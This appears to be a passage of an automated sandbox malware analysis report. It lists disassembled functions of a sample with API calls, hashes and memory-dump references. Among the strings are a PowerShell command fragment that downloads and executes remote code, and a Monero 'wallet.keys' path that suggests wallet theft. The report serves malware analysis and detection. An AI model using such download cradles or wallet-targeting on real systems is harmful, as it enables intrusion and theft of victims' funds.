                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 1c5a11a7c1f987783231e994d9bd73e3cc687df6d6a82531461e7a5511890bd0
                  • Instruction ID: 2934d97566983950181b7e35bb3ec32d9084a681ba17749d08122bbca44e84eb
                  • Opcode Fuzzy Hash: 1c5a11a7c1f987783231e994d9bd73e3cc687df6d6a82531461e7a5511890bd0
                  • Instruction Fuzzy Hash: 2B41AD71D112089ADB14FFA0D991FDDB7B8AF14310F804199E116B6192DF747ACACF91
                  Function 00B09E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B09F41
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: a0809c790c85ae3d25a74c78d3c9f1b14b55f613a4c3360beb16ea1806289fd6
                  • Instruction ID: 8192fa2eedbf2b3004d12bc8ed7c9a8c06cec65e8d0a653cf25e8428577a9169
                  • Opcode Fuzzy Hash: a0809c790c85ae3d25a74c78d3c9f1b14b55f613a4c3360beb16ea1806289fd6
                  • Instruction Fuzzy Hash: E7615D70A102089BDB24EFA4DC96FED77F9AF50300F408458F90A5F1D1EB706A46CB52
                  Function 00B140B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,011FD718,00000000,00020119,?), ref: 00B140F4
                  • RegQueryValueExA.ADVAPI32(?,011FDD30,00000000,00000000,00000000,000000FF), ref: 00B14118
                  • RegCloseKey.ADVAPI32(?), ref: 00B14122
                  • lstrcat.KERNEL32(?,00000000), ref: 00B14147
                  • lstrcat.KERNEL32(?,011FDC70), ref: 00B1415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValue
                  • String ID:
                  • API String ID: 690832082-0
                  • Opcode ID: 731a334f30e511164672e509e0e2833919e1f5584e26bb732fd30f326896ceef
                  • Instruction ID: 0a9142993a4080d69646280554e9ef927c6d6a0027bc21b0edc6807669e6f83b
                  • Opcode Fuzzy Hash: 731a334f30e511164672e509e0e2833919e1f5584e26bb732fd30f326896ceef
                  • Instruction Fuzzy Hash: B641DBB6D40208ABDB14EFA4DC46FFD377DAB48300F404998B615961C1EE755B888BF2
                  Function 00B16920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 00B1696C
                  • sscanf.NTDLL ref: 00B16999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B169B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B169C0
                  • ExitProcess.KERNEL32 ref: 00B169DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 48df913dd22a43a4bf809243b5eb571123c75d1215eb8887585abc29330bff1b
                  • Instruction ID: cbdbc3727dcd333919696d7a8f5c54b5014a255bae01d8a894e5f104c2d40e15
                  • Opcode Fuzzy Hash: 48df913dd22a43a4bf809243b5eb571123c75d1215eb8887585abc29330bff1b
                  • Instruction Fuzzy Hash: EA21EA75D14208ABCF04EFE8D945AEEB7B5FF48300F04856AE406E3250EB345605CBA5
                  Function 00B17E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,011EB818,00000000,00020119,?), ref: 00B17E5E
                  • RegQueryValueExA.ADVAPI32(?,011FD418,00000000,00000000,000000FF,000000FF), ref: 00B17E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00B17E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: a83d640789b6aa6ed70fe6a64289a4141be4f6d5e5b8c552f190125f931db89d
                  • Instruction ID: c2ceeddf64c0c189d396d7bc662cc7df561239ad6dec528b4ba5df22ed554df9
                  • Opcode Fuzzy Hash: a83d640789b6aa6ed70fe6a64289a4141be4f6d5e5b8c552f190125f931db89d
                  • Instruction Fuzzy Hash: 38113DB6A84305ABD710CF98DD49FABBBFCEB05710F104199F605E7280DB7458018BA1
                  Function 00B19260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(011FD8B0,?,?,?,00B1140C,?,011FD8B0,00000000), ref: 00B1926C
                  • lstrcpyn.KERNEL32(00D4AB88,011FD8B0,011FD8B0,?,00B1140C,?,011FD8B0), ref: 00B19290
                  • lstrlen.KERNEL32(?,?,00B1140C,?,011FD8B0), ref: 00B192A7
                  • wsprintfA.USER32 ref: 00B192C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: 3c99a2306b15ae6a59ff727b323a82f268ede0f452704523b9e54ba0291e0519
                  • Instruction ID: 34f770ee2d24f9c4ceee603e69f80c7c25bbe9dd29aab6dc9a7c3fe69fbeb065
                  • Opcode Fuzzy Hash: 3c99a2306b15ae6a59ff727b323a82f268ede0f452704523b9e54ba0291e0519
                  • Instruction Fuzzy Hash: BB011E75540208FFCB04DFECC994EAE7BB9EF44354F108148F9498B304C631AA40DBA1
                  Function 00B012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B012B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B012BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B012D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B012F5
                  • RegCloseKey.ADVAPI32(?), ref: 00B012FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 6f49af939af380145631702f5f70addfffc28af504652e162f06778906bbc14c
                  • Instruction ID: db43cd5cb786b22e8b1ba0401823cd63ec2dec5875535e9f7c9b0c8433aa20bb
                  • Opcode Fuzzy Hash: 6f49af939af380145631702f5f70addfffc28af504652e162f06778906bbc14c
                  • Instruction Fuzzy Hash: 9701E1B9A40308BBDB14DFE4DC49FAEB7BCEB48705F108159FA05D7280D6759A018F61
                  Function 00B1C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Type
                  • String ID:
                  • API String ID: 2109742289-3916222277
                  • Opcode ID: a18dc697bd2fd42eff389578d8059fb4cc4cda773e8c09375236581b4b10ad8c
                  • Instruction ID: eb5253c89ef1407a887173fdcb7080459f22d2bbf802082b30182edc37a7b03a
                  • Opcode Fuzzy Hash: a18dc697bd2fd42eff389578d8059fb4cc4cda773e8c09375236581b4b10ad8c
                  • Instruction Fuzzy Hash: B341F67154075C5EDB228B248C84FFB7FF8DF45744F9444E8E98A86182D2719A84CF64
                  Function 00B16630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B16663
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B16726
                  • ExitProcess.KERNEL32 ref: 00B16755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 95b9d9197f09d5b607147410671ded54f84ca3356ed01efd26a7daa4755f0143
                  • Instruction ID: 8371e34260a645b0dfd9a22bdbf32c4f90e05079218979da9775bbf633d9c8af
                  • Opcode Fuzzy Hash: 95b9d9197f09d5b607147410671ded54f84ca3356ed01efd26a7daa4755f0143
                  • Instruction Fuzzy Hash: 75312FB1C01218ABDB14EF54DD91FDE77B8AF04310F805189F209A6191DF746B89CFA6
                  Function 00B187C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B20E28,00000000,?), ref: 00B1882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B18836
                  • wsprintfA.USER32 ref: 00B18850
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 7cd9aef5bb63d28dac76d10aa509022b24cf557d3617f684b8d33b354f6ba8d2
                  • Instruction ID: 247aefffd1fdb02932649c474c5145226fe577fcae2509847fc67621120ec729
                  • Opcode Fuzzy Hash: 7cd9aef5bb63d28dac76d10aa509022b24cf557d3617f684b8d33b354f6ba8d2
                  • Instruction Fuzzy Hash: AB211AB5A80308ABDB14DF98DD49FAEBBB8FB49711F104159F605E7390C779A9008BA1
                  Function 00B18D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B1951E,00000000), ref: 00B18D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B18D62
                  • wsprintfW.USER32 ref: 00B18D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 8029aaafd2f99642a57ba77ea342f85c0e1b9b99fc8d055a9a2f809910a98ae8
